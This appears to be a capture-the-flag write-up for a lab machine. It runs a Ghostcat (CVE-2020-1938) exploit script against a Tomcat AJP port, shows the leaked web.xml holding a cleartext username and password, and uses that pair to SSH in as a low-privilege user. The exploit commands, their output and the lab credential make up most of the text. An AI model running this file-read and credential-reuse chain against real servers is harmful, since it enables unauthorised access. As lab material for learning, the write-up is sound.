CVE-2020-1938
The target AJP endpoint appears to be vulnerable to [[Tomghost_CVE-2020-1938#[CVE-2020-1938](https //nvd.nist.gov/vuln/detail/cve-2020-1938)|CVE-2020-1938]] or “Ghostcat”
┌──(kali㉿kali)-[~/archive/thm/tomghost]
└─$ python2 CVE-2020-1938.py 10.10.81.214
Getting resource at ajp13://10.10.81.214:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8730281lkjlkjdqlksalks
</description>
</web-app>Executing the exploit script retrieved the content of the WEB-INF/web.xml file, which contains a CLEARTEXT credential; skyfuck:8730281lkjlkjdqlksalks
Given the target Tomcat instance doesn’t allow accessing sensitive endpoints outside of the localhost address, this credential might be a system credential.
SSH
┌──(kali㉿kali)-[~/archive/thm/tomghost]
└─$ ssh skyfuck@$IP
The authenticity of host '10.10.198.73 (10.10.198.73)' can't be established.
ED25519 key fingerprint is SHA256:tWlLnZPnvRHCM9xwpxygZKxaf0vJ8/J64v9ApP8dCDo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.198.73' (ED25519) to the list of known hosts.
skyfuck@10.10.198.73's password: 8730281lkjlkjdqlksalks
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
skyfuck@ubuntu:~$ whoami
skyfuck
skyfuck@ubuntu:~$ hostname
ubuntu
skyfuck@ubuntu:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:e6:f7:17:b3:d5 brd ff:ff:ff:ff:ff:ff
inet 10.10.198.73/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::e6:f7ff:fe17:b3d5/64 scope link
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the skyfuck user via exploiting [[Tomghost_CVE-2020-1938#[CVE-2020-1938](https //nvd.nist.gov/vuln/detail/cve-2020-1938)|CVE-2020-1938]] or “Ghostcat”